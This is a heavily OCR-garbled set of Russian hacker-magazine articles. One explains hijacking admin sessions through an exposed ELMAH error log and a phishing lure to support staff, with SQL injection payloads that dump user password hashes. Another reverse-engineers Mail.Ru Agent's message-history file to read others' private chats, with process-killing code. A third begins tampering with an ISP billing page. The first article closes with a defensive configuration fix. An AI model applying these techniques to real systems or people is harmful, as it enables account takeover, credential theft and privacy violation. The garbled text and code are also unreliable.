исключении, установив сизІотЕггог в режим оп (включен), но это 
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не поможеттебе скрыть эту информацию от ЕІ.МАН, в журнале ты 
найдешь полное описание ошибки. 

Идем дальше. ЕІ.МАН не ограничивается регистрацией исклю- 
чения. Он также записывает информацию и о запросе, повлек- 
шем за собой некорректную работу сайта, сохраняя, например, 
такие серверные переменные, как НТТР СОО КІ Е, НТТР_Н05Т, 
НТТР_ІІ5ЕР_А0ЕЫТ и тому подобные. Наибольший интерес для нас 
представляют серверные переменные НТТР_С00К1Е и АІІТН_ІІ5ЕР. 
Переменная АІІТН_ІІ5ЕР содержит имя пользователя, который 
выполнил запрос. В твоем случае значение этой переменной будет 
равно асітіп. Переменная НТТРСОО КІ Е содержит куки пользова- 
теля. Если он был авторизован на сайте, то в переменной должно 
быть значение куки .А5РХАІІТН. Этот кукис используется для 
проверки подлинности запроса от определенного пользователя. 
Таким образом, если пользователь находится на сайте, ты можешь 
создать похожие куки в своем браузере и угнать сессию данного 
пользователя. Кроме того, я рекомендую обратить внимание на 
кукис с именем А5Р.МЕТ_5е55ІопІсІ. В нем хранится идентификатор 
сессии атакуемого пользователя. Его стоит похитить на случай, 
если в сессии приложения хранится что-нибудь важное. Теперь 
у тебя есть достаточно информации для проведения атаки на 
пользователя системы. Она довольно проста: ты должен найти ак- 
тивную сессию авторизованного пользователя и скопировать куки 
.А5РХАІІТН и А5Р.ЫЕТ_5е55ІопІсІ в свой браузер. 



УГОНЯЕМ СЕССИИ ПОЛЬЗОВАТЕЛЕЙ 



План действий понятен. Переходим к его непосредственной реали- 
зации. Первым делом открой лог ЕІ.МАН и посмотри информацию 
о последних исключениях. Есть шанс, что среди них обнаружится 
информация об активной в данный момент сессии. В этом случае ты 
можешь смело переходить к следующему шагу. Если тебе не повезло, 
то остаются два возможных варианта действий. Во-первых, ЕІ_МАН 
распространяет информацию об ошибках через Р55. Добавь канал 
Ьир://ІосаІЬо5І/Мизіс5іоге/еІтаЬ.ахсІ/г55 в читалку Р55 и спокойно 
жди, пока появится возможность для угона сессии :). Нет времени 
ждать? Тогда тебе на помощь придет социальная инженерия. Пред- 
положим, что ты решил взломать какое-нибудь внутрикорпоративное 
приложение (именно там чаще всего можно встретить незащищен- 
ный Е1.МАН). Попробуй отправить в службу поддержки следующее 
сообщение: «Здравствуйте. Сегодня у меня перестало открываться 
приложение Мизіс 5іоге, постоянно выводится ошибка 404. Пример 
ссылки, которую я пытаюсь открыть: Шр://ІосаІбо5і/Ми5Іс5іоге/5іоге/ 
Вго\л/зе>азрх". Особенность ссылки в том, что страница сгенериру- 
ет ошибку 400 «Плохой запрос», которая будет записана в журнал 
ошибок ЕІ_МАН. Теперь осталось ждать, пока сотрудник службы под- 
держки перейдет по ссылке. Скорее всего, он уже авторизован на сай- 
те, поэтомуты сможешьугнать его сессию. Наша операция переходит 
в активную фазу. Открывай ѵѵеЬ-страницу ЕІ.МАН и ищи информацию 
о куках сотрудника службы поддержки. Скорее всего у тебя в руках 
окажется что-то аналогичное: 




Конфигурация ЕІ.МАН по умолчанию в ѴѴеЬ.сопгід тестового сайта 




Получаем список пользователей Мивіс Біоге с помощью БОЬинъекции 



А5Р.МЕТ_5еББІопІсІ=3(Ддтс1кІідра1:52диорсс:іод ; 
. А5РХАІ)ТН=СРВ45Ѳ13РР38АР7Р2759ВА6РАА7Р98ЕѲ7 



В84С6СВ5ВСС76Е7АЕ89969ѲСС2Ѳ16В5Р1ВСЕ9СРСВАА 



Осталось создать подобные куки в твоем браузере. Для этой 
цели я использую браузер Рігеіюх с плагинами РігеЬид и Рігесоокіе. 
Кукис А5Р.МЕТ_5еззіопІсІ скорее всего уже существует, поэтому 
просто обнови его значение. После этого создай кукис .А5РХАІІТН. 
Вот и все! Далее перезагрузи страницу и открой раздел админи- 
стрирования сайта, щелкнув по ссылке Абтіп в правом верхнем 
углу главной страницы. Если все верно, и сессия пользователя 
еще активна, то ты войдешь в админку, не зная при этом пароль 
администратора сайта. 



И ЭТО ЕЩЕ НЕ ВСЕ 



ЕІ.МАН не только позволяет подключаться к активным сессиям 
пользователей, но и существенно облегчает поиск уязвимо- 
стей на сайте. Давай в качестве примера проведем атаку типа 
501 Іщесііоп на наш Мизіс 5іоге. Я специально добавил такую 
уязвимость в учебный пример — в оригинальной версии Мизіс 
5іоге от МісгозоЙ данная проблема отсутствует. Давай посмо- 
трим, какустроена страница поиска альбома. Открывай Шр:// 
ІосаІЬозі/Мизіс5іоге/5еагсЬ. Как видишь, здесь есть только поле 
для поиска и кнопка сабмита. Теперь необходимо удостовериться, 
возможно ли выполнить 501-запрос, да и вообще, есть ли доступ 
к базе данных на этой странице. У тебя есть доступ к ЕІ.МАН, зна- 
чит, можно упростить себе жизнь и попробовать сгенерировать 
исключение. Введи что-либо наподобие ог зеіесі 1 {гот аЬсбеГ. 
Скорее всего, в базе данных не будеттаблицы с именем аЬссМ 
(я бы за такую таблицу руки разработчику оторвал). Как и ожи- 
далось, поиск вызвал исключительную ситуацию в коде. Теперь 
необходимо удостовериться, действительно ли на странице воз- 
можна 501-инъекция. Открывай лог ЕІ.МАН и смотри последнее 
исключение: 

$ѴБІ=ет.Ра1=а.5д1С1іеп1=.5д1Ехсер1=іоп (0x80131904) : 

ТпсоггесЕ зѵпііах пеаг Ііііе кеѵыогсі ' БеТесЕ'. 

ТпсоггесЕ Бѵпііах пеаг '%' . 

ЦпсІОБесІ диоііаіііоп шагк а-РІіег Ііііе сбагасЕег біігіп^ ' ' . 

О чем говорит эта ошибка? Во-первых, сайт построен на базе 
СУБД 50І_ 5егѵег. Во-вторых, поле ввода ключевого слова не филь- 
труется. Теперьу тебя должно быть достаточно информации для 
проведения атаки. 

Кстати, ЕБМАН позволяет не только убедиться, что на странице 
есть 5(ЗІ_-инъекция, но и автоматизировать поиск подобных уязви- 
мостей на других страницах. Поэтому первым делом при анализе 
логов обрати внимание на ошибки с типом 5дІ. Ты также можешь 
скачать список ошибок в формате С5Ѵ, воспользовавшись ссылкой 
Ьир://ІосаІНо5І/Мизіс5іоге/еІтаЬ.ахсІ/сІоѵѵпІоасІ, и затем произвести 
дальнейший анализ в МісгозоЙ ЕхсеІ или при помощи скриптов. 

Для начала давай попробуем получить список всех альбомов. Воз- 
вращайся на страницу поиска и вводи следующий текст: ог 1 

= 1 Получил? Отлично. Теперь давай попробуем сделать что- 
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А5Р.ЫЕТ: темная сторона трассировки 




• Сайт ЕІ.МАН 
(исходный код, 
документация и т.д.): 
согіе.аооаіе.сот/р/ 
еІтаИ . 

• Репозиторий 
Мибеі: пичеі.ога . 

• учебное ѵѵеЬ- 
приложение АБР. 

ИЕТ МѴС МизісБІоге: 

тѵстизісзіоге. 

сосіеріех.сот/ . 

• РігеЬид: 
аеМігеЬиа.сот . 

• Рігесоокіе: 
ЫЦу/оМЬх7В . 

• ѴізиаІ ѴѴеЬ йеѵеі- 
орег 2010 Ехргезз: 
ЬіСІѵ/ІсіатН . 

• БСИБегѵег 2008 
Ехргеэз: 

Ьіі.Іу/АЦрСі . 

• Утечка системной 
информации через 
систему трассировки 
АБР.ЫЕТ (Тгасе.ахіІ): 
Ьи.1у/ха225п . 



Пример информации об ошибке в ѴѴеЬ-интерфейса ЕІ.МАН 



нибудь более серьезное, например получим список пользователей 
и хеши паролей. 

Мизіс Біоге, разработанный при помощи А5Р.ЫЕТ МѴС и 501 
Зегѵег, использует авторизацию через ѵѵеЬ-формы (это следует из 
того, что при авторизации создается кукис .А5РХАІІТН]. Мож- 
но предположить, что разработчики решили воспользоваться 
системой авторизации, которая идет в поставке А5Р.ЫЕТ, начиная 
с версии 2.0. Если все сходится, то информация о пользовате- 
лях хранится в таблицах азрпеІ_ІІ5егз и азрпеІ_МетЬегзЫр. 
Чтобы знать наверняка, выполни следующий запрос: "НгЕб 1 
апсі ехІ5^5(5е1ес^ 1 -Рпогп зуз.ѣаЫеБ мЬеге пате = 'азрпе^ 
ІІзегз') Запрос вернул результат — ты на верном пути. 

Теперь осталось получить список пользователей. Предположим 
(если интересно, то можешь посмотреть исходный код страницы), 
что скрипт запрашивает из базы данных два поля: идентифика- 
тор альбома и название. Тогда попробуем выполнить следующий 
запрос: 

зеіесі: 1. и.ІІзегМате + + т. Раззіл/огсІ + + 

т.РаззмогсІБаІІ: Тгот сІЬо.азрпеІ: ІІзегз аз и 

іппег іоіп сІЬо.азрпеІ: МетЬегзЬір аз т оп и.ЦзегІсІ = 



И теперь еще один запрос, только в виде эксплойта для формы 
поиска: 

1,1 апсі 1 о 1 ипіоп аіі зеіесі: 1. и.ІІзегІЧате + 4 

т. РаззмогсІ + + т. РаззыопсІБаІІ: Тгот сІЬо.азрпеіІІзегз 

аз и іппег іоіп сІЬо. азрпеіМетЬегзЬір аз т оп и.ЦзегІсІ = 
т.іізегісі 



КАК СЕБЯ ОБЕЗОПАСИТЬ? 



Как видишь, средства, облегчающие жизнь разработчикам 
и службе поддержки, могут быть очень опасны, если использо- 
вать их по принципу «поставил и забыл». Сразу хочу отметить, 
что описанные выше проблемы с безопасностью — это не ошибка 
в ЕІ.МАН, а ошибка в конфигурации ѵѵеЬ-приложения. Более того, 
защититься от подобных проблем можно довольно просто. Я сам 
повсеместно использую ЕБМАН и отключать его в обозримом 
будущем не планирую, тем более, что в моем случае это зачастую 
единственное доступное средство отладки. Поэтому я всегда 



использую стандартные средства безопасности А5Р.ІЧЕТ, причем 
изменения вносятся только в ѴѴеЬ.сопПд и не требуют перекомпи- 
ляции приложения. Если твое приложение использует авториза- 
цию пользователей через ѵѵеЬ-формы, то тебе помогут следующие 
рекомендации: 

1. Сначала удали регистрацию ЕБМАН из разделов сопЛдигаЬоп/ 
зузІет.ѵѵеЬ/ЬирНапсІІегз и сопПдигаІіоп/зузІет.ѵѵеЬЗегѵег/ 
Ьапсііегз файла ѴѴеЬ.сопЛд; 

2. После этого добавь в раздел сопЛдигаІіоп следующий ХМ Б: 

<1оса1:іоп раі:Ь="е1таЬ.ахсІ"> 

<зуз1:ет.ыеЬ> 

<И1=1=рНапсІ1ег5> 

<ас!сІ ѵегЬ="Р0 5Т, ( ЗЕТ, НЕДР" ра1:М= " еІтаМ . ахсі" 

іѵре="Е1таЬ. ЕггогБо^Ра^еРасІіогу . ЕІтаЬ" /> 

</ИігЕрНап<Яегз> 

<аи 1 :ЬогІ 2 а 1 :іоп> 

<а!1оы го1ез="АсІтіпІ5І:га1:ог" /> 

<сІепу изегз="*" /> 

</аи 1 :ЬогІ 2 а 1 :іоп> 

</зѵз1:ет.ыеЬ> 

, <зуз1:ет • ѵмеЬБегѵег > 

<ЬапсІ1ег5> 

<ас!сІ пате="Е1таЬ" раі:Ь="е1таЬ . ахсі" 

ѵегЬ="Р05Т.6ЕТ.НЕАР" 

1:уре="Е1таЬ. ЕггогБо^Ра^еРасііогу . ЕІтаЬ" 

ргеСопсШ:1оп="1п1:е^па1:ес1Мос1е" /> 

</ЬапсІ1ег5> 

</зѵз1:ет.ыеЬ5егѵег> 

</1оса1:іоп> 

Готово! Теперь только пользователь с ролью Асітіпізігаіог 
сможет просматривать логи ЕБМАН, а это именно то, что нам нужно. 



НАПОСЛЕДОК 



Надеюсь, я смог показать тебе, как безопасные на первый взгляд 
средства для разработчиков и сотрудников службы поддержки 
могут нанести непоправимый вред компании при условии, что 
безопасность приложения неправильно сконфигурирована. Всегда 
думай о последствиях и никогда не полагайся на принцип «поста- 
вил, работает, не трогай». ІНІ 
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6аг|к (дагікгасоги.ѵѵз) 




МаіІ.Ки Агента 



ПОЛУЧАЕМ ДОСТУП К ИСТОРИИ 
ПЕРЕПИСКИ И КОНТАКТАМ 
В ПОПУЛЯРНОМ МЕССЕНДЖЕРЕ 



* 

3 

і 



Ты вряд ли пользуешься МаіІ. 
Ри Агентом, но это бешено 
популярный сервис, который 
с каждым днем набирает 
обороты. По официальным 
данным месячная аудитория 
этого мессенджера в конце 
прошлого года составляла 
безумную цифру в 21,4 
миллиона человек. Это 
легко объяснить, — продукт 
действительно удачный. Но 
сегодня я хочу рассказать 
о том, как был разреверсен 
файл с историей сообщений 
пользователя. 



ѴѴАІМШС 



Не забывай о статье 
138 — «Нарушение 
тайны переписки, 
телефонных 
переговоров, 
почтовых, 
телеграфных или 
иных сообщений» 
УК РФ, а также 
о наличии в ней 
главы 28 — 
«Преступления 
в сфере 
компьютерной 
информации» (ст. 
272, 273, 274). 



гтп 

На дискеты найдешь 
пример читалки 
истории тга.сІЬв, 
реализацию класса, 
упрощающего 
исследование 
бинарных файлов 
в ѴѴіпНех-редакторе, 
и другие материалы 
по статье 



ИСТОРИЯ ВЗЛОМА 

Эксперимент начался для меня еще в далеком 2008 году, когда 
друг попросил проверить переписку его девушки в МаіІ.ги Аген- 
те. Тогда файл истории представлял из себя простой текстовик 
с названием *етаіІ*Ы5Іогу.ІхІ и имел по сравнению с тга.сІЬз 
(файл, в котором в настоящее время хранится история переписки 
и данные о контактах) примитивную структуру. За пару часов был 
написан простой, но эффективный РТР-конвертер, который и де- 
лал всю грязную работу по вытягиванию переписки из Агента. 
Друг был в восторге. Далее, в ходе изучения программирова- 
ния на компилируемых языках, я в качестве практики написал 
программу МаіІ.ги Нізіогу Реасіег, описание которой попало на 
страницы ][ в августе 2009 года. Получив большое количество 
положительных отзывов, я опубликовал структуру формата 
тогдашнего файла истории (см. ссылки в боковом выносе) и ис- 
ходники читалки. Однако МаіІ.ги Агент продолжал развиваться, 
и править балом стал новый продвинутый файл тга.бЬз. После 
этого события ко мне посыпались тонны сообщений от различ- 
ных людей с просьбами заняться им. В компании с 50ЮІМ7 мы 
ковыряли этот файл в НЕХ-редакторе, пытаясь найти структуры, 
ссылки на смещения и всевозможные изменения после запуска 
МаіІ.ги Агента. К концу 2010 года после долгих поисков формат 
все-таки покорился. 



060 



ХАКЕР 04/159/2012 





Взлом МаіІ.Ри Агента 



КАК ДОБЫТЬ ФАЙЛ МРА.БВ5? 

Ты, конечно, задашься вопросом: а где, собственно, хранится 
этот пресловутый тга.сІЬз, и как его добыть? Файл тга.сІЬз 
хранится в папке <<%АРРОАТА 0 /о\Мга\Вазе\тга.сІЬ5» (напри- 
мер «С:\0оситеп1з апсі 5еиіпдз\изег\АррІіса{іоп 0а1а\Мга\ 
Ва5е\тга.сІЬ5»), и заполучить его при выключенном Агенте 
не так уж и сложно, достаточно лишь использовать функции 
ЕхрапсІЕпѵігоптепіВігіпдз и СоруРіІе. Однако при включенном 
Агенте файл тга.сІЬз является занятым и система попросту не 
позволит его использовать. Для решения этой проблемы можно, 
например, временно отключить Агент (для этого действия тебе 
понадобятся привилегии отладчика, которые можно получить 
только с правами Администратора) или найти открытый хэндл 
файла в системе, а затем продублировать его в адресное про- 
странство своего процесса. Также можно прочесть файл напря- 
мую с диска (правда, для этого нужно знать, что такое кластер 
и как работать напрямую с драйвером файловой системы) или 
же написать собственный файловый драйвер (это практически 
нереально). Все бы хорошо, но на практике у всех вышепере- 
численных методов есть свои недостатки. При перечислении 
хэндлов с помощью 2ѵѵ0иегу5у5ІетІп{огтаІіоп и их копировании 
к себе в процесс с помощью ОирІісаІеНапсІІе можно столкнуться 
с двумя проблемами. Первая заключается в том, что при вызове 
ІѵѵОиегуІп^огтаІіопРіІе поток может повиснуть, ожидая отклика 
от блокирующего именованного канала. Вторая — после копиро- 
вания оба хэндла (наш и открывшего файл процесса) будутука- 
зывать на один РіІеОЬ]есЕ а следовательно — текущий ре жим 
ввода-вывода. Позиция в файле и другая связанная с файлом 
информация будут общими у двух процессов, поэтому даже 
чтение файла вызовет изменение позиции чтения и нарушение 
нормальной работы программы, открывшей файл. Конечно, 
можно приостановить на время все потоки процесса файла, а по- 
сле копирования восстанавливать позиции чтения и запускать 
процесс владельца снова, но это связано с большими затратами 
времени и сил. Казалось бы, идеальным методом может являть- 
ся прямое чтение с диска, но и здесь есть недостатки. Таким 
способом можно читать только файлы, которые открываются 
с доступом РІЕЕ_РЕА0_АТТРІВІІТЕ5 (кроме файлов подкачки), 
файл обязательно должен быть не сжат, не зашифрован (иначе 
мы прочитаем ерунду) и иметь свой кластер (маленькие файлы 
в ІМТР5 могут целиком размещаться в МРТ). Также следует 
учесть, что во время чтения файл может быть изменен (и мы 
получим в результате непонятно что). Поэтому разберем самый 
простой метод с временным отключением процесса Агента. 

Итак, чтобы убить процесс МаіІ.ги Агента, для начала не- 
обходимо узнать его идентификатор (РгосеззЮ). Сделать это 
можно разными способами: через ТооІНеІр АРІ, через ІМаІіѵе АРІ 
(используя функцию ІѵѵОиегуВузІетЫогтаІіоп), прошерстив 
список открытых хэндлов или по списку открытых процессом 
окон (ОеіѴѴіпсІоѵѵТИ геасі РгосеззІсІ). Самый легкий вариант — это 
использование ТооІНеІр АРІ ипоискпоимени ехе-файла. Для 
этого достаточно вызвать функции СгеаІеТооІЬеІр325парзЬоІ > 
Ргосезз32Ріг5І > Ргосезз32І\ІехЕ а затем в теле цикла сверять 
значение поля згЕхеРПе структуры РР0СЕ55ЕЫТРУ32 с тадепЕ 
ехе. Необходимый нам РгосеззЮ находится в этой же структуре, 
поле 1Ь32РгосеззЮ: 

ЬРгосе555пар=СгеаЕеТоо1Ье1р325пар5ЬоЕ(ТН32С5_5І\ІАРРКОСЕ5Б,Ѳ); 
Ш ІІМѴАЫР НАІМРІ.Е ѴАШЕ != ЬРгосеззБпар) 

і_ 

ре32.с!ы5І2е = зігеоТГ РКОСЕ55ЕІМТКУ32 ); 

ІТ( Ргосезз32РігзЕ( ІіРгосеззБпар., &ре32 ) ) 

{ 

гіо 

{ 

ІТ(Ѳ == 1зЕгстр( , ре32.52ЕхеРі1е. ТЕХТГ'та^епЕ. ехе" ))) 

{ 
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Идентификаторы начала переписки 

і рісІ=ре32 . 1:Іі32Ргосе55ІР ; 

і Ьгеак; 

! ь_ 

> 

ыІ1І1е( , Р^осе5532Nеx^^=( , ІіРгосеззБпар. &ре32 )); 

І _Ь_ 

СІозеНапсІІеГ ІіРгосеззБпар ); 

} 

і После того как мы найдем РЮ, нам необходимо получить 

привилегии отладчика БеОеЬидРгіѵіІеде (ОрепРгосеззТокеп > 
ЕоокирРгіѵіІедеѴаІие > Аф'изЕГокепРгіѵіІедез) и убить процесс 
(ОрепРгосезз > ТегтіпаІеРгосезз), а потом снова попытаться вы- 
звать СоруРіІе. Привилегии можно получить и более элегантным 
і путем — через Ыаііѵе АРІ: 

І ѵоісі СеЕРгіѵі1е§е(ІІ\І ІАОІМС Ргіѵі1е§е) 

I ^ 

ВООІ.ЕАІМ ОІсІѴаІие; 

КЕ1АЬдизЕРгіѵі1е§е(Ргіѵі1е§е., ТКІІЕ* РАІ.5Е . &01сІѴа1ие); 

} 

і Все, тга.сІЬз у нас в руках. Теперь перейдем к его потрошению :). 

РАСКРЫВАЕМ СЕКРЕТЫ МРА.БВ5 

Файл тга.сІЬз представляет из себя дамп памяти МаіІ.ги Агента, 
поэтому открыть его для чтения при работающей программе не 
представляется возможным (для рядового программиста, но у нас 
і свои секреты :), также задачу усложняет тот факт, что в памяти 
і все числа хранятся в перевернутом виде. Однако давай немного 
і углубимся в реверс-инжиниринг. 

Итак, в недрах тга.сІЬз существует хеш-таблица, в которой 
описаны смещения на 4-байтные идентификаторы. Идентифика- 
торы служат для определения начала записи различных структур 
и сегментов дампа, среди которых и находятся нужные нам записи 
і истории переписки (обрати внимание на соответствующую иллю- 
і страцию): 

Еѵресіе-Р зЕгисЕ ісіз { 
ипзіепесі іпЕ і сіі; 
ипзі^песі іпЕ ісІ2; 
ипзіепесі іпЕ с оипЕ; 

} _ісіз ; 

і Начало истории характеризуется ключевым словом 

тгаЫз1огу_, за которым следует е-таіі хозяина файла тга.сІЬз 
и е-таіі контакта, с которым ведется переписка. В случае с исто- 
рией идентификаторы образуют двусвязный список: первый ведет 
і к первому отправленному сообщению, а второй — к последнему 
і принятому сообщению. Количество сообщений можно узнать, 
і изучив четыре байта после идентификаторов (структура _ібз). 
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Структура записи сообщения 

Пройдя по смещению идентификатора (его можно узнать из хеш- 
таблицы] мы попадем на запись сообщения (снова все внимание на 
соответствующий рисунок): 

5 ~Сгис~Е шезза^е 

Ь_ 

ипБІ^пес! іпі: зііе; 

ипБІепесІ іпі: р г еѵ ісі ; 

ипБІепесІ іпі: пехі ісі; 
ипБІепесІ іпі: хгі; 

РИЕТІМЕ 1 =іте; 

ипБІепесІ іпі: Туре_те 5 а§е; 

сЬаг Па§_іпсотіп§; 

сЬаг Ьѵііе [ 3 ] ; 

ипБІепесІ іпі: с оипі: піск; 

ипБІепесІ іпі: та^іспит; // 0x38 

ипБІепесІ іпі: соипі: теБ Ба ^е; 

ипБІепесІ іпі: хт2; 

ипБІепесІ іпі: Б ігеірзгі-р; 

ипБІепесІ іпі: хіЗ; 

Строки в дампе сохраняются в кодировке ІІпісосІе (ѵѵсЬаг_Д раз- 
личными способами: 

• с завершающим нулем в конце строки; 

• в структуре І_Р5 (название структуры взято из описания фор- 
мата протокола ММР), где первые четыре байта указывают на 
длину последующей строки; 

• в формате РТР. 

Зная количество сообщений, нам не составит труда пробежать- 
ся по всей цепочке. Но откуда вообще узнать, где находится эта 
хеш-таблица, и как найти начало записей истории? Над поисками 
ответов к этим вопросам мы с 50І_0І\І7 провели немало бессонных 
ночей. 



НЕМНОГО МАГИИ 

По смещению 0x10 от начала файла тга.сІЬБ, как оказалось, и хра- 
нится адрес заветной хеш-таблицы. Пройдя по смещению первого 
индекса из хеш-таблицы, мы натыкаемся на структуру началь- 
ных данных. Возможно, там находится вообще вся информация, 
заложенная в тга.сІЬБ. Идем дальше. По смещению 0x20 в этой 



Поиск хеш-таблицы 

структуре хранится количество записей истории или, проще 
говоря, количество переписок. Так как файл дампа постоянно 
расширяется, то по смещению 0х2С лежит идентификатор послед- 
ней записанной истории, — это все, что нам нужно знать, чтобы 
начать искать идентификаторы переписок. 

В целом же алгоритм такой: 

• проходимся по идентификаторам записей истории с помощью 
цикла (начиная от последней добавленной записи); 

• если в этой записи от смещения 0x190 присутствует слово 
«тгаЬІ5Іогу_», то это означает, что по смещению 0x24 лежат 
идентификаторы цепочки сообщений данной переписки. 

Чтобы стало немного понятней, взгляни на этот код: 

РіліОКР * о-р-РвеІ: іа Ь1е=( Р іліОКР *)(тга Ьаве + 

*( РіліОКР*) ( тгаЬаБе + 0x10) V. 

РіліСЖР епсІ_ісІ_таі1=* ( РіліОКР* ) ( тга_Ьа5е+Ѳх2Ѳ+ 
оіІ5е1:_1:аЫе[1] ) ; 

РіліОКР соип1:_етаіІ5 =* (РіліОКР*) (тга_Ьа5е+0х2С+ 

о-р-Рзе-МЕаЬІеХі] ); 



іоіЧіпі і=Ѳ; і<соип1:_етаіІ5;д.++) 

ісіб *таі1_сІа1:а =(5І:гис1: ісіб*) (тга_Ьа 5е+ 

0ІІ5еі_1:аЬ1е[епсІ_ісІ_таі1]+4) ; 
і-р(теттет( ( (ипБІепесІ сЬаг*) таі1_с!а1:а+Ѳх19Ѳ) . 
тгаЬІБІогу., . . . ) ) 

{ 

етаіІ5[к] . ісІ=(_ісІ5*) ((ипБІепесІ сЬаг*)таі!_сІа1:а+Ѳх24) ; 



} 

еп сіісіта І1=та іісіаіі а - >±сІ2 ; 

Ь- 

ХОДИМ 

Журнал не резиновый, поэтому исходный код читалки тга.сІЬБ ищи 
на диске. Сейчас я покажу тебе лишь самые основные моменты. 
Итак, файл тга.сІЬБ является дампом памяти, поэтому мы не будем 
извращаться и использовать функции для работы с файловыми 
смещениями, а сразу поместим его в память нашей программы. Для 
этого заюзаем ресурсы ОС ѴѴіпсіоѵѵб и создадим Метогу МарресІ 
файл: 



ТИПЫ СООБЩЕНИЙ МКА.РВ5 
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Взлом МаіІ.Ри Агента 




ІѴІѴІѴІ 

• Описание формата 
истории МаіІ.ги 
Агента до версии 5.4: 

ЫЫу/22ЕТМУ: 

• обсуждение МаіІ.ги 

Ніаіогу Кеасіег: 
Ьіиу/х2оКѵЦ: 

• мой блог: 
сОсІесІдагік.ЫодБроі. 
сот: 

• С++ класс для 
создания ѵѵіпііех. 
роз-файлов: 
ЬИ. 1 у/ 25 ТЛЬ: 

• три метода 
работы с занятыми 
файлами: 
ЬИ.1у/2Ыд025: 

• различные 
способы получения 
списка процессов: 
Ьіі.Іу/ѵѵ4ир25: 
•уменьшение 
размера Си- 
программы на 
примере ѴізиаІ 
Зіисііо: 

ЬК.1у/уу7бУУМА . 



ішп 

Хеш-таблица — это 
структура данных, 
реализующая 
интерфейс 
ассоциативного 
массива, она 
позволяетхранить 
пары «ключ- 
значение». 
Двусвязный 
список состоит из 
элементов данных, 
каждый из которых 
содержит ссылки 
как на следующий, 
так и на предыдущий 
элементы. 



Интерфейс моей читалки 



СгеаѣеРіІе 

СгеаІіеРіІеМар 

МарѴіемО-РРіІе 

Ѵіг1:иа1Рпее 

СІозеНапсІІе 

СІозеНапсІІе 

Так как нам не нужно сохранять внесенные изменения обратно 
в файл, то здесь вместо ІІптарѴіеѵѵОІ : РіІе используется ѴИиаІРгее. 
Первое, что мы сделаем, это найдем все контакты из истории пере- 
писки. Хранить найденное добро будем в структуре етаііз: 

•Еѵресіе-Р 5І:гисѣ _етаі1з{ 
ысбагТ *етаі1; 

_ісІ5 *ісІ; 

}; 



зіігисі: етаііз *етаі1з; 



етаіІ5=Ѵіг1:иа1А11ос('Ѳ.соип1:_еі , паіІ5*5І2ео-р(5І:гис1: етаііз) , , , ) ; 



РІСН ТЕХТ РОКМАТ (РТР) 



РТР, использующийся в тга.сіЬБ, представляет из себя формат 
хранения размеченных документов, предложенный еще в 1982 году 
бородатыми программистами из МісгозоК и АсіоЬе. Для его парсинга 
совершенно не обязательно изобретать велосипед, а достаточно 
лишь отправить сообщение ЕМ_5ТРЕАМІІЧ с флагом 5Р_РТР для 
записи и ЕМ_5ТРЕАМ01Л с флагом 5Р_ТЕХТ для чтения: 

ЕОІТ5ТКЕАМ ез =_і 0 }; 

ез . рТпСаІІЬаск = ЕсІіТБТгеатСаІІЬаск; 

ез.сІи/Соокіе = (01лЮКР_РТК)&1рз; 

$епсІМе55а^е(ІіКісІі. ЕМ5ТКЕАМІІМ. 5Р РТР. (І_РАКАМ)&ез ); 



После прохода по идентификаторам и поиска строки 
«тгаЫзІогу_» наша структура будет заполнена адресами иден- 
тификаторов. Заметь, при этом мы не скопировали даже байта 
и израсходовали всего лишь 16*соипІ_етаіІз байт (например, при 1 
000 контактов мы используем всего ~15 килобайт памяти). Теперь, 
имея на руках идентификаторы начала переписки с конкретным 
пользователем, мы можем прочитать сообщения: 

іпі ісі те55а^е=етаіІ5[к] . ісі - >ісІ1 : 

ТоіЧіпІ: і=0; і<етаі1з[к] . ісІ->соип1:_те55а§е5; і++) 

і_ 

_тез5а§е*те5=(_тез5а§е*) (тга_Ьазе+ 
о-Р-Рбѳі: 1:аЫе[ісІ тезза^е] ) : 
ысІіаг_1=*5І:г=(ысІіаг_1=*и (ипзі^песі сІпаг*)те5+ 
51ж€0'€(_тез5а§е) ) ; 



Іс1_те5 5а§е=тез->ргеѵ_іс1; 

} 

Дата сообщения хранится в формате РИЕТІМР, для удобства 
ее можно перевести в удобочитаемый вид с помощью функции 
РіІеТітеТоЗузІетТіте. Формат РТР отлично воспринимается 
РісЬ ЕсШ'ом и любыми другими стандартными редакторами типа 
ѴѴогбРасІ. Но с этим можно и не заморачиваться, так как сообще- 
ния хранятся в неотформатированном виде сразу после ника, а их 
размер указан в структуре теззаде. Это все, что тебе нужно знать, 
чтобы получить удобоваримый список мессаг из Агента. 

Р.5. 

К сожалению, формат журнала не позволяет привести здесь мои 
хардкорные изыскания полностью, поэтому поспеши заглянуть на 
диск. Надеюсь, пример кода читалки (ехе'шник которой, кстати, с по- 
мощью небольшой оптимизации уместился всего в 2 килобайта безо 
всяких пакеров) поможеттебе в написании быстрого и крутого С-кода, 
а также в изучении Ьех-редакторов и других низкоуровневых вещей. 
Кстати, незатронутой осталась не менее увлекательная тема чтения 
истории ІСО-переписки, которая также хранится в файле тга.сІЬз. 
Спасибо компании МаіІ.Ри, во-первых, за разработку МаіІ.Ри Агента, 
во-вторых, за заметное развитие любимой аськи, и в-третьих, за 
интересный квест, о котором я тебе сегодня рассказал. ПЕ 
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ѴѴАКЫШС 



Вся информация 
предоставлена 
исключительно 
в ознакомительных 
целях. Ни редакция, 
ни автор не несут 
ответственности за 
любой возможный 
вред, причиненный 
материалами данной 
статьи. 



НЕВЫДУМАННАЯ 
ИСТОРИЯ О СЕРЬЕЗНЫХ 
УЯЗВИМОСТЯХ 
ПРОВАЙДЕРА 



Эта история взлома была бы ничем не 
примечательна, если бы не одно «но». Жертвой 
глупейших ошибок программистов стал довольно 
крупный провайдер. Элементарные уязвимости 
в личном кабинете пользователя позволяли 
манипулировать денежными средствами на счете 
любого из клиентов. Такое Увы, и такое бывает. 
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Будни халявщика 



V кйСѴСІЬ ■СШЛІЗН’НКІЬ 



ЦЕЛИТ! ■ЖЧЛк-Чгр 
Ц-ГЛГП- О* РЧКТ^т* 
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Страница перевода средств 



ВВЕДЕНИЕ 

История началась очень странно. На календаре было 31 декабря, 
а на ноутбуке — дисконнект. Средства на счете закончились, 
и было совершенно непонятно, что дальше делать всю ночь без 
интернета (в новогоднюю-то ночь? — прим, редакции)? На счете 
ѴѴеЬтопеу не было достаточно денег, чтобы полностью оплатить 
абонентскую плату, поэтому я уже готов был идти к ближайше- 
му терминалу оплаты. Зайдя в личный кабинет, чтобы уточнить 
стоимость абонентки, я обратил внимание на неактивные ЫтІ- 
переключатели, расположенные на странице перевода средств. 
Похоже, Дед Мороз все-таки существует :). 

БЫТЬ ИЛИ НЕ БЫТЬ? 

Дальше я полез в исходный код страницы с помощью браузера 
Орега и убрал у соответствующих переключателей параметр 
